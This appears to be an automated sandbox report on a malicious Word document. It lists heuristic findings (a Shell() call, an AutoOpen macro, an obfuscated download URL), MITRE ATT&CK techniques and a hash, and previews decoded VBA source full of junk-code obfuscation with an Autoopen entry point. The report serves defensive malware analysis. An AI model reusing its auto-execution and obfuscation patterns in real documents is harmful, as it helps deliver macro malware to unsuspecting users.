MALICIOUS
144
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The critical OLE_VBA_SHELL heuristic indicates the presence of a Shell() call within the VBA code, which is commonly used to execute arbitrary commands or download additional payloads. The de-obfuscated URL 'http://www.ber' is likely the source for such a payload. The AutoOpen macro further suggests an immediate execution upon opening.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
URL de-obfuscated from VBA string literal (1 URL) info OLE_VBA_OBFUSCATED_URLA VBA macro hides its download URL inside a string literal that is de-obfuscated at runtime — junk digits or a Replace() junk token interleaved through the URL, or the URL stored reversed (StrReverse). The decoded host is the next-stage payload URL (URLDownloadToFile/XMLHTTP/ShellExecute); surfaced as an IOC. Self-validating: only a transform that yields a syntactically valid host URL is reported.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.ber Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 50202 bytes |
SHA-256: 5acf4bae256fc82637293638a683fef160e789afd6ddc70c71d90c841f8054b0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "wimwrPXb"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AQQtI(BCCiht)
Select Case VnvsfA
Case 75252
IOvUp = Hex(usiZiG - ChrW(HfRtqt))
VYuHz = CByte(64390)
MiiWmL = rCUYSV
Case 12415
YEznq = HdwpH
vjToU = Round(15956)
iKzDw = Log(DPdwUX)
End Select
End Sub
Sub ILAqI(rMFEf)
Select Case inwHij
Case 8552
SXwYB = Hex(tmwdh - ChrW(RjQjjd))
IRpdGU = CByte(43296)
HFHvP = MEkNc
Case 78372
SEObW = PuWOY
Bwtdu = Round(84935)
ilmhq = Log(ROEfjW)
End Select
Select Case oZpMb
Case 3699
THWkqj = Hex(OTTbpV - ChrW(KUfXX))
EmKPqs = CByte(32706)
bGhBs = kXOCq
Case 13048
DulDqB = iFJoDI
jwGtwS = Round(50976)
NmawMn = Log(FdjRBB)
End Select
Select Case ZMAqhk
Case 41360
szjdDb = Hex(JroRQ - ChrW(wdtovs))
jImHd = CByte(77810)
usHkp = RucNj
Case 68669
zUocj = LaiGCl
VPkLcA = Round(29514)
NQkDb = Log(OEBjFM)
End Select
End Sub
Sub CLTJYs(wLmFzz)
Select Case CKQliU
Case 14161
EEZHlz = Hex(hawZK - ChrW(EQBDH))
GBiiEi = CByte(5232)
ukvWr = RHOjQG
Case 60516
dLJZmc = tOhbhA
aaVdjk = Round(52077)
fZhkBw = Log(RmAHf)
End Select
Select Case SVirZ
Case 27869
VNvKZ = Hex(jnOnXu - ChrW(jjjrB))
Bqzuba = CByte(39948)
HFqlJ = ZbRiX
Case 21612
PODwc = fqmln
wNKYSU = Round(68570)
XYiXC = Log(YaFOF)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case qIlbt
Case 92008
OpUVTD = Hex(LJPDwK - ChrW(Guqjfw))
nElXj = CByte(37831)
pbjiXV = PDCOU
Case 14135
PLCPu = kNuvOz
akiwnj = Round(91665)
hjYbo = Log(qrnSL)
End Select
WkPIGTiLlw (LYtjHl + AcLKQCUTNzSNP + PbjoQX)
Select Case viUEak
Case 22470
ifdoFM = Hex(WHcCKX - ChrW(qzrBv))
uBsIEB = CByte(44862)
Wjrad = qOFTjb
Case 42728
ZLNNP = oVNZpf
jnVjDp = Round(63824)
XlcjtM = Log(tYVUKp)
End Select
End Sub
Sub juqmiX(WRlzr)
Select Case bkjcl
Case 78903
BZljV = Hex(LboDUV - ChrW(FGbtQL))
wBTqi = CByte(3100)
AJoti = kaHIK
Case 32738
LZhNQc = DVIqLa
GAFuzU = Round(56594)
RzKmA = Log(fzSiz)
End Select
Select Case zYTFZ
Case 12203
zfAwi = Hex(pdZBO - ChrW(wUAIh))
icjYW = CByte(81852)
LNiij = UqMifQ
Case 2125
iKjFzE = DtwQm
vibaJ = Round(19813)
XuHvtB = Log(WkqVrj)
End Select
Select Case zRwTYm
Case 74934
UlRuz = Hex(MkDVG - ChrW(FkDoM))
LwTCaZ = CByte(11003)
wMfHlX = PaVdw
Case 9161
JzmAk = VPNHG
booRKs = Round(78213)
cAFvj = Log(GqJhLN)
End Select
End Sub
Sub roTPZo(FhwXBI)
Select Case PaJKkJ
Case 68244
JtrRBQ = Hex(Ffwslk - ChrW(VBlDFP))
Biubmq = CByte(30065)
XaDHz = aYInTa
Case 54577
aIWMP = HZjEU
HLwqPZ = Round(31015)
IWoik = Log(uccQm)
End Select
End Sub
Attribute VB_Name = "TiHmEabKtztzn"
Sub XOcSX(KYJETs)
Select Case vKfzQS
Case 59944
ZEJlpw = Hex(KLcpr - ChrW(wjzJts))
uYCSLw = CByte(61044)
NzdjI = wKSjiv
Case 8359
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.